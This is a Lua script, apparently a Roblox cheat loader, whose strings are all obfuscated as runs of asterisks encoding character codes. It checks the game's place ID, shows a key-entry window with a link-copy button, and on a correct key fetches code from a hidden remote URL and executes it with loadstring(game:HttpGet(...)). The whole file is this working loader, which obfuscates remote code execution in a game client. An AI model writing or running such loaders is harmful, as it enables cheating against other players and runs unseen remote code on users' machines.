function EMOqQCWaKySKSdswnL(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 



-- Supported Game IDs and their respective exploit URLs
local supportedGames = {
    [17405136959] = EMOqQCWaKySKSdswnL({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**********************************************************************************','*****************************************************************************************************','********************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','****************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','***************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***********************************************','**************************************************************************************************************','*****************************************************************************************************','***********************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','********************************************************************************************************','********************************************************************************************************','********************************************************************************************************','********************************************************************************************************','********************************************************************************************************','********************************************************************************************************'}), -- First game ID and URL
    [1962086868] = EMOqQCWaKySKSdswnL({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','**********************************************************************************','*****************************************************************************************************','********************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','****************************************************************************','*****************************************************************************************************','*************************************************************************************************','***********************************************************************************************************','***************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***********************************************','********************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','***********************************************************************************','**************************************************************************************','*****************************************************************','**********************************************************************************','*****************************************************************************************','*****************************************************************************************','*****************************************************************************************','*****************************************************************************************','*******************************************************************','*******************************************************************','*******************************************************************','*************************************','**************************************************','************************************************','********************************************************************'}) -- Second game ID and URL
}

local correctKey = EMOqQCWaKySKSdswnL({'********************************************************************','*****************************************************************************************************','**********************************************************************************************************************'})  -- Replace this with your actual key
local keyLink = EMOqQCWaKySKSdswnL({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*********************************************************************************************************','**************************************************************************************************************','**********************************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','***********************************************','**************************************************************************************************************************','**************************************************************************************************','*****************************************************************************','******************************************************************************************','***************************************************************************','**************************************************','******************************************************************************************************************','****************************************************************************************************************'})  -- Replace with the actual link to get the key

-- Function to check if the current game is supported
local function getExploitUrl()
    local gameId = game.PlaceId
    return supportedGames[gameId]
end

-- Check if the game is supported
local exploitUrl = getExploitUrl()
if not exploitUrl then
    local announcement = Instance.new(EMOqQCWaKySKSdswnL({'***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}), game.CoreGui)
    local frame = Instance.new(EMOqQCWaKySKSdswnL({'**********************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}), announcement)
    frame.Size = UDim2.new(0, 300, 0, 100)
    frame.Position = UDim2.new(0.5, -150, 0.5, -50)
    frame.BackgroundColor3 = Color3.new(0, 0, 0)
    local label = Instance.new(EMOqQCWaKySKSdswnL({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','****************************************************************************','*************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}), frame)
    label.Size = UDim2.new(1, 0, 1, 0)
    label.Text = EMOqQCWaKySKSdswnL({'************************************************************************************','********************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','********************************','*******************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************','********************************','*********************************************************************************************************','*******************************************************************************************************************','********************************','**************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','********************************','*******************************************************************************************************************','*********************************************************************************************************************','****************************************************************************************************************','****************************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','**********************************************','********************************','************************************************************************************','********************************************************************************************************','*****************************************************************************************************','********************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','********************************','***********************************************************************************************************************','*********************************************************************************************************','************************************************************************************************************','************************************************************************************************************','********************************','**************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','********************************','************************************************************************************************************','***************************************************************************************************************','*************************************************************************************************','****************************************************************************************************','**********************************************'})
    label.Font = Enum.Font.GothamBold
    label.TextColor3 = Color3.new(1, 1, 1)
    label.TextSize = 20
    wait(5)
    announcement:Destroy()
    return
end

-- Create GUI for key input
local keyGui = Instance.new(EMOqQCWaKySKSdswnL({'***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}), game.CoreGui)
local frame = Instance.new(EMOqQCWaKySKSdswnL({'**********************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}), keyGui)
frame.Size = UDim2.new(0, 300, 0, 200)
frame.Position = UDim2.new(0.5, -150, 0.5, -100)
frame.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
frame:TweenPosition(UDim2.new(0.5, -150, 0.5, -100))

-- Create title label
local label = Instance.new(EMOqQCWaKySKSdswnL({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','****************************************************************************','*************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}), frame)
label.Size = UDim2.new(1, 0, 0, 50)
label.Position = UDim2.new(0, 0, 0, 10)
label.Text = EMOqQCWaKySKSdswnL({'*********************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','********************************','*************************************************************************************************************************','***************************************************************************************************************','*********************************************************************************************************************','******************************************************************************************************************','********************************','***********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','**********************************************************'})
label.Font = Enum.Font.GothamBold
label.TextSize = 20

-- Create TextBox for key input
local textBox = Instance.new(EMOqQCWaKySKSdswnL({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','***************************************************************************************************************','************************************************************************************************************************'}), frame)

textBox.Size = UDim2.new(0.8, 0, 0, 30)
textBox.Position = UDim2.new(0.1, 0, 0, 70)
textBox.BackgroundColor3 = Color3.new(0.3, 0.3, 0.3)
textBox.PlaceholderText = EMOqQCWaKySKSdswnL({'*********************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','********************************','***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************'})
textBox.Font = Enum.Font.Gotham
textBox.TextColor3 = Color3.new(1, 1, 1)
textBox.TextSize = 18

-- Create submit button
local submitButton = Instance.new(EMOqQCWaKySKSdswnL({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'}), frame)
submitButton.Size = UDim2.new(0.5, 0, 0, 30)
submitButton.Position = UDim2.new(0.25, 0, 0, 110)
submitButton.BackgroundColor3 = Color3.new(0.4, 0.4, 0.4)
submitButton.Text = EMOqQCWaKySKSdswnL({'***********************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*************************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************'})
submitButton.Font = Enum.Font.GothamBold
submitButton.TextColor3 = Color3.new(1, 1, 1)
submitButton.TextSize = 18

-- Create link button to get the key
local linkButton = Instance.new(EMOqQCWaKySKSdswnL({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'}), frame)
linkButton.Size = UDim2.new(0.5, 0, 0, 30)
linkButton.Position = UDim2.new(0.25, 0, 0, 150)
linkButton.BackgroundColor3 = Color3.new(0.4, 0.4, 0.4)
linkButton.Text = EMOqQCWaKySKSdswnL({'***********************************************************************','*****************************************************************************************************','********************************************************************************************************************','********************************','***************************************************************************','*****************************************************************************************************','*************************************************************************************************************************'})
linkButton.Font = Enum.Font.GothamBold
linkButton.TextColor3 = Color3.new(1, 1, 1)
linkButton.TextSize = 18

-- Handle key submission
submitButton.MouseButton1Click:Connect(function()
    if textBox.Text == correctKey then
        frame:TweenPosition(UDim2.new(0.5, -150, 1.5, -100), Enum.EasingDirection.InOut, Enum.EasingStyle.Quad, 1, true, function()
            keyGui:Destroy()
            loadstring(game:HttpGet(exploitUrl))()
        end)
    else
        label.Text = EMOqQCWaKySKSdswnL({'*************************************************************************','**************************************************************************************************************','**********************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************','********************************','***********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','********************************************','********************************','****************************************************************************************************************','************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','********************************','********************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************************','********************************','*************************************************************************************************','*******************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','**********************************************'})
        textBox.Text = EMOqQCWaKySKSdswnL({})
    end
end)

-- Handle link button click
linkButton.MouseButton1Click:Connect(function()
    setclipboard(keyLink)
    label.Text = EMOqQCWaKySKSdswnL({'****************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************************************************************************','********************************','***************************************************************************************************','***************************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','********************************','********************************************************************************************************************','***************************************************************************************************************','********************************','***************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','**************************************************************************************************','***************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','********************************','*************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','********************************','*********************************************************************************************************','********************************************************************************************************************','********************************','********************************************************************************************************************','***************************************************************************************************************','********************************','*******************************************************************************************************','*****************************************************************************************************','********************************************************************************************************************','********************************','*************************************************************************************************************************','***************************************************************************************************************','*********************************************************************************************************************','******************************************************************************************************************','********************************','***********************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','**********************************************'})
end)

-- Function to create the rainbow color effect
local function rainbowEffect(label)
    local RunService = game:GetService(EMOqQCWaKySKSdswnL({'**********************************************************************************','*********************************************************************************************************************','**************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','******************************************************************************************************************','**********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','*****************************************************************************************************'}))
    local hue = 0
    RunService.RenderStepped:Connect(function()
        hue = (hue + 1) % 360
        label.TextColor3 = Color3.fromHSV(hue / 360, 1, 1)
    end)
end

-- Apply the rainbow effect to the title label    
